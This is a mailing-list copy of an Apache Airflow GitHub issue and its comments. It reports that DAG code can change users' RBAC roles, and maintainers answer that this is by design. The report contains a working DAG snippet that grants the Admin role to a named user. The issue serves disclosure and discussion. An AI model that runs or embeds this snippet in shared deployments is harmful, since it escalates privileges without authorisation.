You are viewing a plain text version of this content. The canonical link for it is here.
Posted to commits@airflow.apache.org by GitBox <gi...@apache.org> on 2021/09/30 16:44:35 UTC
[GitHub] [airflow] rssanders3 opened a new issue #18643: Users able to Update Roles through DAG Definition
rssanders3 opened a new issue #18643:
URL: https://github.com/apache/airflow/issues/18643
### Apache Airflow version
2.0.2
### Operating System
CentOS
### Versions of Apache Airflow Providers
N/A
### Deployment
Virtualenv installation
### Deployment details
Installation of Apache Airflow is running on Virtual Machines and configured with LDAP Authentication:
```
authenticate = True
auth_backend = airflow.contrib.auth.backends.ldap_auth
```
### What happened
While performing a security review of Apache Airflow, the Team appears to have discovered a security hole where users can update their own RBAC role or the roles of someone else on their team by using the Flask Appbuilder within a DAG definition.
### What you expected to happen
I would hope that users would not be able to update their Roles for security purposes.
### How to reproduce
1. Create a new user with limited permissions (in example username is "test-user")
2. Deploy the following DAG:
```
import airflow
from airflow.models import DAG
from airflow.operators.dummy_operator import DummyOperator
from airflow.www.app import cached_app
from datetime import timedelta
appbuilder = cached_app().appbuilder
user = appbuilder.sm.find_user(username='test-user')
print(user)
print(user.roles)
role = appbuilder.sm.find_role('Admin')
if role in user.roles:
pass
else:
user.roles.append(role)
default_args = {
'owner': 'Airflow',
'start_date': airflow.utils.dates.days_ago(1),
}
dag = DAG(
dag_id='appbuilder-test',
default_args=default_args,
schedule_interval=None,
dagrun_timeout=timedelta(60),
)
start_task = DummyOperator(task_id="start", dag=dag)
```
3. Open the Airflow Webserver as the Admin user and see that the "test-user" now has the "Admin" role assigned
### Anything else
Confirmed that this is an issue with other versions of Apache Airflow 2.x, including the latest stable release: 2.1.4.
### Are you willing to submit PR?
- [X] Yes I am willing to submit a PR!
### Code of Conduct
- [X] I agree to follow this project's [Code of Conduct](https://github.com/apache/airflow/blob/main/CODE_OF_CONDUCT.md)
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscribe@airflow.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org
[GitHub] [airflow] mik-laj commented on issue #18643: Users able to Update Roles through DAG Definition
Posted by GitBox <gi...@apache.org>.
mik-laj commented on issue #18643:
URL: https://github.com/apache/airflow/issues/18643#issuecomment-931637131
See also: https://github.com/apache/airflow/issues/9342
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscribe@airflow.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org
[GitHub] [airflow] potiuk commented on issue #18643: Users able to Update Roles through DAG Definition
Posted by GitBox <gi...@apache.org>.
potiuk commented on issue #18643:
URL: https://github.com/apache/airflow/issues/18643#issuecomment-932976056
Yep. This is a feature of Airflow (in its current version) RBAC is just a UI not DAG concept and it only prevents the UI users from doing stuff, not the DAG writers. Airflow does not have multi-tenancy yet, and while we are working in this direction, it will not be there for quite some time.
Also - thanks for reporting it in general and while it is not a security issue but feature of the project, but in case in the future you have similar issues - PLEASE @rssanders3 DO NOT report issues related to security in public issues. This is non-responsible disclosure and when you raise an issue where you even suspect that there might be a security issue, you should follow the Security Policies which ask you to responsibly disclose it via sending email to security@apache.org.
Here is our security policy https://github.com/apache/airflow/security/policy
and when you open a new issue it's pretty clearly linked to from the issue list:
![Screenshot from 2021-10-03 17-39-40](https://user-images.githubusercontent.com/595491/135761419-e04ec01a-2dc0-4923-a3d9-28522d677b9d.png)
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscribe@airflow.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org
[GitHub] [airflow] mik-laj closed issue #18643: Users able to Update Roles through DAG Definition
Posted by GitBox <gi...@apache.org>.
mik-laj closed issue #18643:
URL: https://github.com/apache/airflow/issues/18643
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscribe@airflow.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org
[GitHub] [airflow] boring-cyborg[bot] commented on issue #18643: Users able to Update Roles through DAG Definition
Posted by GitBox <gi...@apache.org>.
boring-cyborg[bot] commented on issue #18643:
URL: https://github.com/apache/airflow/issues/18643#issuecomment-931489465
Thanks for opening your first issue here! Be sure to follow the issue template!
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscribe@airflow.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org
[GitHub] [airflow] rssanders3 commented on issue #18643: Users able to Update Roles through DAG Definition
Posted by GitBox <gi...@apache.org>.
rssanders3 commented on issue #18643:
URL: https://github.com/apache/airflow/issues/18643#issuecomment-933751070
Hello @potiuk, sure thank you for letting me know about this process. I will follow this one in the future and review the Issue options more closely in the future. Thank you, Robert.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscribe@airflow.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org
[GitHub] [airflow] mik-laj commented on issue #18643: Users able to Update Roles through DAG Definition
Posted by GitBox <gi...@apache.org>.
mik-laj commented on issue #18643:
URL: https://github.com/apache/airflow/issues/18643#issuecomment-931636341
[Project assumptions](https://github.com/apache/airflow/issues/10130) on Airflow security assume that the author of the DAG has free access to the database, so they also can mutate roles. Therefore, we cannot fix this bug. This requires a major architectural change to Airflow, so it must be preceded by a long discussion. As we are not able to do anything with this ticket yet, I close it.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscribe@airflow.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org